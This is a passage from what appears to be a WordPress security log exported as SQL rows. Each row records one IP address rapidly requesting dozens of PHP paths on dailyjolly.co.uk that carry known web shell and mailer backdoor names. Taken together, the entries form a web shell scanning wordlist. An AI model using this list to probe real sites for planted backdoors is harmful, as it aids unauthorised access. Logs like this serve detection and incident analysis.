.1788,55,'skoIprQExJPLvgWKj9Aqlt24','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/wp-conflg.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369937.5595,50,'ZwtBm5FM2AxGuT9qWjs1HiJO','','10|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/wp-signup.php',0,10,0),('167.172.248.229',2813130981,'',0,1674369937.5701,55,'ZwtBm5FM2AxGuT9qWjs1HiJO','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/certificates/wp-signup.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369937.9432,55,'W2rCmOB4nvs7KwMYxLDuP8G9','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/01%20copy.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369938.2811,55,'QmR1JGWFOH40Z9VAlLtfUvsT','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/01589a.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369938.6093,55,'DeK3QiE40OqRXdYVk9CpFsgZ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/88981.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369939.1289,55,'r6xTQ7twsRikBvfVn8bOAJpP','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/bimowdoodk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369939.4643,55,'pwmQPILAMdVX7WngjG4hxJuC','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css-blog.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369939.8086,55,'7EPRz65ltB3yaKdVXxLHr1DF','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/mpv2.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369940.1424,55,'e4V0y98f2gzasZhwmKIUjNbd','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/str_replace.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369940.4744,55,'xZvhQPpsric8FT9UaElYDqGf','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/customize/elbjewpi.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369940.8033,55,'Wju3EhCmXVgpURKcN64LkZYw','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/customize/inpf8747384.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369941.1374,55,'oh2rVmu7ANXiWfC9ZE4keLy0','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/setcookie.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369941.5142,55,'28jsfnpZ3tEd7hLiMkWq16KT','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/sqlite_pagebreak_adapter.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369941.8610,55,'lkfQ2F0KsDSqIzpobVdCtjJn','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/l.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369942.2160,55,'4wKnP7lap5RFDi9LNbhcuZEf','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/license.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369942.5636,55,'EO0jUzwM7qfbrJPpCXF5hHY6','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/module.audio-video.riff-wp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369942.8916,55,'fmyQTIhVOX0SJHnvWdPwqRFl','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/tablepress_controllers.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369943.2369,55,'1eiKutAgXlpNF2sMYHPVCTnW','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/unzipper.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369943.5696,55,'7GLsqd9TWwD8aovmnV5YpK0t','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/vp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369943.9211,55,'CRsJPqN1puxOGHMwTYyUgXFr','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ID3/wp-plugins.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369944.2284,55,'iY4dJl62P9EGHW0UX5caCwRQ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/acces.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369944.6017,55,'nSqOGNCmXaKZeQTVicF3EW0U','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/configure.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369944.9291,55,'Tw6N25syAZFUDYPQGv7E0niq','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/img911.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369945.2487,55,'uVwOsFehgp5z62S7MATnWr9R','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/IXR/opt.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369945.5740,55,'x1GVYhjOEm32l0wicA9Uafpe','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/IXR/tablepress_controllers.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369945.9008,55,'QcfnWVCx6O07DmewkXbj8aGy','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/auto.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369946.2354,55,'zo9KHtjbcnl7Xy8GDW4e5CVw','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/old.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369946.5880,55,'agHYeptzfD6PSivjUCGh9omd','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/system.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369947.2834,55,'rIVdz5pSYhi0JwD6GEyWOmcF','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/247@abu.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369947.6411,55,'rCRPSKsbLqj469ZX5kpQxoH2','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/bak.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369947.9920,55,'7jn2A3EwKRBp0eZ9iyVuNdGW','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/css_.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369948.3608,55,'oKzdZ6kO0smJcFVxLlAXHnga','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/Oilmoney.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369948.6846,55,'g6opOslN3849RTzSKktV1XfH','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/tablepress_controllers.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369948.9993,55,'opzjUF8yxms4Vu0aqEh5X1cv','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/treame.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369949.3482,55,'ANJPhw52zHEOVtQkTIuK04c3','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/user-new.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369949.6945,55,'9XCzivyEBteP78owIxKlDMLZ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/wp-y4y54.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369950.0123,55,'Ap9xnMmuX5erS3PJBoIL1GaQ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/yellow.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369950.3407,55,'9fZeUsGNbOhFoJI4P5Xk2d8g','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/zlib.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369950.6617,55,'pmJc7VBW0isNoPGAtfabud2Z','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/random_compat/random_bytes_cyclone.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369950.9788,55,'Co5AcwO6TUkEytizbDlHBM8X','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/SimplePie/acces.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369951.3672,55,'hQ3iB0J2XkTY4dNuCWsOjRtw','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/theme-compat/back-up.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369951.6795,55,'UIo0yAcGjfLdBYn3TQrKwhiO','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/theme-compat/border.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369952.0064,55,'Y4kUdfa3pcr0tFTvPoCm2yeA','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/theme-compat/ok.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369952.3404,55,'htA6Il7TgDFa2f4uZRyJPpzq','','19|0|0|0|www.dailyjolly.co.uk/.well-known/leafmailer2.8.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369952.7271,55,'0ZtqzPsgS15Gf7mLkhbuxa9K','','19|0|0|0|www.dailyjolly.co.uk/.well-known/mail.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369953.0805,55,'dVlSb4soacPirwJ0KhpjEX2A','','19|0|0|0|www.dailyjolly.co.uk/files/x3dleaf.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369953.4170,55,'Ai1NqlhpuB3eSVn2ym6JxKHr','','19|0|0|0|www.dailyjolly.co.uk/files/mailer.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369953.8009,55,'3Qmov0sMLBlRiSDuNTaEdUky','','19|0|0|0|www.dailyjolly.co.uk/.well-known/js.php/.well-known/mail.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369954.1266,55,'NMLpRXIeJKTYuaSW21HVrd0h','','19|0|0|0|www.dailyjolly.co.uk/.well-known/dze.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369954.4851,55,'45yxzcArBaRglsw3EFkCq2Go','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/%20.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369954.8197,55,'s7vDre0zqMQXUESlOtyjCPxH','','19|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/dx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369955.1804,55,'KtGvXfpZxhPYybzOWVi60Le3','','19|0|0|0|www.dailyjolly.co.uk/.well-known/utchiha505.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369955.5034,55,'emVC3U1kS9jHbKs60c8AXPfO','','19|0|0|0|www.dailyjolly.co.uk/01.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369955.8168,55,'9xYcuoDSvHfbqdgFIXAhRe24','','19|0|0|0|www.dailyjolly.co.uk/02.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369956.1318,55,'qnhl925beINYw8SQpTGmEkcR','','19|0|0|0|www.dailyjolly.co.uk/0z.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369956.4546,55,'3ZvEgC9ajOtY6SGIy4KiHRnL','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369956.7717,55,'8GxrH0hY3nqueaCtQlK6WRAB','','19|0|0|0|www.dailyjolly.co.uk/1337.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369957.1025,55,'MAlJVcaf1EzD7PwXngpjkIsU','','19|0|0|0|www.dailyjolly.co.uk/1h6j5.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369957.4232,55,'6SyeIwQDkLsKY5XGzpTCaHR8','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369957.7364,100,'MDSiEQHGlJ1RtXe5wrf9OZIv','','13|0|0|0|www.dailyjolly.co.uk/1index.php',0,13,0),('167.172.248.229',2813130981,'',0,1674369958.0605,55,'KjRvIAd4WNZr61TlGYJLMgxs','','19|0|0|0|www.dailyjolly.co.uk/2index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369958.3879,100,'8R1I79seU64KgO0xGiZQWJCn','','13|0|0|0|www.dailyjolly.co.uk/2index.php',0,13,0),('167.172.248.229',2813130981,'',0,1674369958.7196,55,'LX4EaKmgOMFsH9035ZlQeThI','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369959.0474,100,'V6RJGQPfK3WD0eBTYck1m4Fz','','13|0|0|0|www.dailyjolly.co.uk/3x.php',0,13,0),('167.172.248.229',2813130981,'',0,1674369959.3789,55,'cdW6OTfsHYR9euDC5lm8itpN','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369959.6875,55,'fx2pIbvO6SP5GagqCehmWoBn','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369960.0259,55,'PeOuRmwgaQzhvs2FC0T4nkUK','','19|0|0|0|www.dailyjolly.co.uk/4price.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369960.3492,55,'MWvCUX7ahfENKqwFncD1rp4G','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369960.6780,55,'9mu5Qwkv4IxHfLcVteJ78NSg','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369961.0276,55,'CDc2ag3eU96Qo5uRzMi14Elq','','19|0|0|0|www.dailyjolly.co.uk/admin/controller/extension/wpm.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369961.3768,55,'ZmACcyIJ90fLxBGvS6KiRqj4','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369961.6947,55,'uSNxM4iGrkfCyU7bITdFHXa9','','19|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/ups.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369962.0264,55,'f0AZDtSmhabyivLsM2K1TBJn','','19|0|0|0|www.dailyjolly.co.uk/autoload_classmap.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369962.3804,55,'LDqTK6Bcz4HysEIUV78NnMl5','','19|0|0|0|www.dailyjolly.co.uk/baindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369962.7376,55,'N1tTzdw0oqsQKeV7jygAnUfI','','19|0|0|0|www.dailyjolly.co.uk/C.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369963.0490,55,'8rC0qzPDEouKfAlSOskB1t42','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369963.4439,55,'LevODFznAbaxrpGsc4l0hWfJ','','19|0|0|0|www.dailyjolly.co.uk/crypted.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369963.7567,55,'JOmGt4CvgzAsuyqKLQe2WZac','','19|0|0|0|www.dailyjolly.co.uk/css/4O4.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369964.0739,55,'o3vL4QcNrXnzByItOGY19f02','','19|0|0|0|www.dailyjolly.co.uk/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369964.3904,100,'F2MoJAkywgeQqZ3rLlvm17dT','','13|0|0|0|www.dailyjolly.co.uk/DKIZ.php',0,13,0),('167.172.248.229',2813130981,'',0,1674369964.6992,55,'4g1JpEoF5hK0TUsVbHR7C9mc','','19|0|0|0|www.dailyjolly.co.uk/doc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369965.0581,55,'qtRLyOiKDIkx5nw469aVQEAJ','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369965.3971,55,'gmJVYkbMNIe6orZh1KWvLQjS','','19|0|0|0|www.dailyjolly.co.uk/good.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369965.7256,55,'uISdjszg901wqycpaXPA8M7v','','19|0|0|0|www.dailyjolly.co.uk/google.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369966.0755,55,'gt7dzB4CcKfJO3n1rWAi6HV5','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369966.3891,55,'MtDRqeZIJSCHcVo5iEp1FaYP','','19|0|0|0|www.dailyjolly.co.uk/hehe.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369966.6966,55,'jVxHUw9LPFumK7yvS40bh5NI','','19|0|0|0|www.dailyjolly.co.uk/image/screenshot_1.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369967.0112,55,'1yeZWM02UkmblBT37ud4HhwG','','19|0|0|0|www.dailyjolly.co.uk/images/vuln.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369967.3429,55,'gB92M3QhyUXapmNE5kDZxO7W','','19|0|0|0|www.dailyjolly.co.uk/images/wp-2019.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369967.6556,55,'bc0XWRQkDzY7xEtKOiU3FIuf','','19|0|0|0|www.dailyjolly.co.uk/ini.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369967.9908,55,'nEX3lsbYSdCRi0m4f1JODUcN','','19|0|0|0|www.dailyjolly.co.uk/lock360.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369968.2982,55,'K1G9SebxhkQwZJc7RAHEqiWu','','19|0|0|0|www.dailyjolly.co.uk/lufix.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369968.6233,55,'UAulBzyxkc8ILsvmjJhGe9rp','','19|0|0|0|www.dailyjolly.co.uk/mad.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369968.9499,55,'DGiJr5MNWLQaXhom80SIpbT3','','19|0|0|0|www.dailyjolly.co.uk/marijuana.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369969.4810,55,'cVojxgaBGkM5t8iUvrd2SO7P','','19|0|0|0|www.dailyjolly.co.uk/mass.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369969.8162,55,'2TrjH1w354bFhfJsyvKtVGlX','','19|0|0|0|www.dailyjolly.co.uk/media-admin.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369970.1347,55,'8uEo69VOWnSewaIfqDjsM3rK','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369970.4587,55,'EPszpkuvZfX3BRrNOGWMHybt','','19|0|0|0|www.dailyjolly.co.uk/mininew.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369970.8028,55,'nYqrOBZWVm3liv4uDPkIdMhp','','19|0|0|0|www.dailyjolly.co.uk/new-index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369971.1380,55,'NJDAzbrVd7TSs2pYcej19Ek0','','19|0|0|0|www.dailyjolly.co.uk/old-index.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369971.4666,55,'HpM92IhP7JvgC1Bnmut6WFO4','','19|0|0|0|www.dailyjolly.co.uk/payout.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369971.7810,55,'dXAbEl6DHZ5JGnotS9ukRVzN','','19|0|0|0|www.dailyjolly.co.uk/pi.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369972.0978,55,'efCnzUq5Z42uILXAik1BJRvV','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369972.4503,55,'4tl0C2zbKUqLmiEuhnAHPfYk','','19|0|0|0|www.dailyjolly.co.uk/R00T.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369972.7753,55,'Zd1yzliovH8Fra4SOcLItw96','','19|0|0|0|www.dailyjolly.co.uk/radio.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369973.0864,55,'yLminFYElS9OQIKrRqNx24cf','','19|0|0|0|www.dailyjolly.co.uk/reminder.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369973.4211,55,'Rv8o6DNljbSyu5zh7LXp2amn','','19|0|0|0|www.dailyjolly.co.uk/screenshot_1.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369973.7451,55,'2XLimcWQP3Vlh67N0z8ojZHC','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369974.1143,55,'jSGheXI6i3E7UwoAxbNdzFla','','19|0|0|0|www.dailyjolly.co.uk/small.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369974.4408,55,'QuXUth1jJ0z3rRi6EIe7Ksld','','19|0|0|0|www.dailyjolly.co.uk/srx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369974.7957,55,'f0jAcW1UxpFQso7MuklJERCV','','19|0|0|0|www.dailyjolly.co.uk/up-kon.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369975.1023,55,'G6n5wcZiQADP9Xf43IFLRUhk','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369975.4391,55,'Szx9EG2yrUDfh6Mg4pPIAFcn','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369975.7486,100,'Fd9oKvOtWNG53jY6rquIcelL','','13|0|0|0|www.dailyjolly.co.uk/upload.php',0,13,0),('167.172.248.229',2813130981,'',0,1674369976.0595,55,'nyw1fc2lOWKCN93i4tbDJUg7','','19|0|0|0|www.dailyjolly.co.uk/uploads/up.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369976.3643,55,'OqAkTofgibdBG6yV2E57tLwQ','','19|0|0|0|www.dailyjolly.co.uk/uploads/xleet.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369976.6964,55,'BnmdhLpfoFv4kCa7KObyH95e','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369977.0172,55,'iUKsIvwbH6uaWZV2OYqn9kGe','','19|0|0|0|www.dailyjolly.co.uk/utchiha.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369977.3356,55,'ASDJrsK5yR2Wvu8m7h4qj90e','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369977.6702,55,'j2oqpwkFTf8z54Qeih7Zat0Y','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/fx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369977.9941,55,'Lm2ZVPFiyCeY7GQsRdao5xN4','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/images/module.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369978.5340,55,'kaiXU2NL0BAf93bmOtGQn4qM','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/maint/ms-db.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369978.8734,55,'VJ1Ns6Ti2kWd4KamzHvXPbwu','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/maint/sidwso.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369979.1961,55,'60ywfKE9vXZPrV5LHDMAhFNn','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/priv8.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369979.5174,55,'JEhset19TcFBl8NjbowviX2C','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/rss.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369980.1187,55,'y5iE9FWxjSsKBz1hJmDoMlQN','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/xleet.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369980.4909,55,'3RqziZ9OT8fatUQHwoYlAbEp','','19|0|0|0|www.dailyjolly.co.uk/wp-blog.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369980.8187,55,'1HGEymFdIaNR8YbeUpOVw3BD','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wp-activate.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369981.1800,55,'PqIdH5XKOlDR3FCS1m4xzi0B','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fw.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369981.5423,55,'FerOEkz5WljQKJhGBaNYqfPM','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/masterx/wpx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369981.8822,55,'GpT7eJQh9w1Pm6kEZMKv4DA5','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/easybusy/wp-blog.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369982.2490,55,'3JG7U9kY1OXLVRE5ympsodhH','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/fighter/fk.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369982.6058,55,'rjlNAJZKoUY3ustRB2aeG5PF','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/wp-pridmag/init.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369982.9688,55,'mksQfv1UXTruwDWS8jtgpK0Z','','19|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/utchiha505.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369983.3059,55,'saB8KWgTnrLUXfbHeYPd17l2','','19|0|0|0|www.dailyjolly.co.uk/wp-content/upload.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369983.6443,55,'ecxM74Di0OYVoQ5gPRCLsFIq','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/wp-content/uploads/code-execution.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369983.9922,55,'TcS53AlY4M9QFtHbJyrjZxaP','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/404.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369984.3242,55,'Qe3wlom0xnkUIAbiYWfEc6yC','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/4O4.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369984.6375,55,'m1HPfcQVghpYlwe6SqbEtOvi','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/elementor/about.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369984.9638,55,'W9Fhuz78CpByDKV6gUPOjlMe','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/external_feed.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369985.2822,55,'ibR5a7ujSPDXkrmIesHnW8f0','','19|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/indoex.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369985.6345,55,'ZChfYJmnvWQz1lKU6uiw8qbL','','19|0|0|0|www.dailyjolly.co.uk/wp-easy.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369985.9521,55,'AU4nPHFjqKhOJb2X7agpzY9i','','19|0|0|0|www.dailyjolly.co.uk/wp-god.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369986.2786,55,'dOvWX0ml3ZefHNJouDkwsjIy','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/24.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369986.5859,55,'kj4hTn1dgOCupbZYrERVQ38F','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/indeh.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369986.9014,55,'U12ewlEZvhVSqpJBAdHrI8XD','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/ms-pie.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369987.2839,55,'WYhpUqjmIM7iLaAnGOxKtD0B','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/radio.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369987.6070,55,'3qa0EuYF2TzjGNJAyX5lC6fM','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/theme-templates-private.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369987.9234,55,'mb5fqSLYdp8FDtX2yxMNiHEj','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/uplaod.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369988.2567,55,'6ORfFoS72pu8VjAZwdzTte3W','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/v22.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369988.5793,55,'FeQcSzyKW4kH91XZg307xa68','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-2019.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369988.8900,55,'8tDxhgC2OelIXYGHuZ3kE7B9','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-includes/admin-bar.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369989.2054,55,'J0Vy1xPZ6dEsSjefwUTlbzQo','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-site.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369989.5336,55,'1lmVAghs97eBTXucQvJ2IwSG','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/xmrlpc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369989.8498,55,'Xk3ZcdlSqMjfzovYpewxWACO','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/xx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369990.1807,100,'SBWA2zrbgplks3P9YXumcyjo','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/1index.php',0,13,0),('167.172.248.229',2813130981,'',0,1674369990.6656,55,'04QdauG2msUITBrWoycz9Pik','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/assets/pi.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369991.0571,55,'aq1ZhjkQsmvKxpyIuUOebtHG','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/block-supports/generated-classname-cron.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369991.3806,55,'4S5kDyLJzBbHVhtY0CK7R3a1','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/ty.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369991.9316,100,'DE7oI9yN2i3daUjZqm6OXxts','',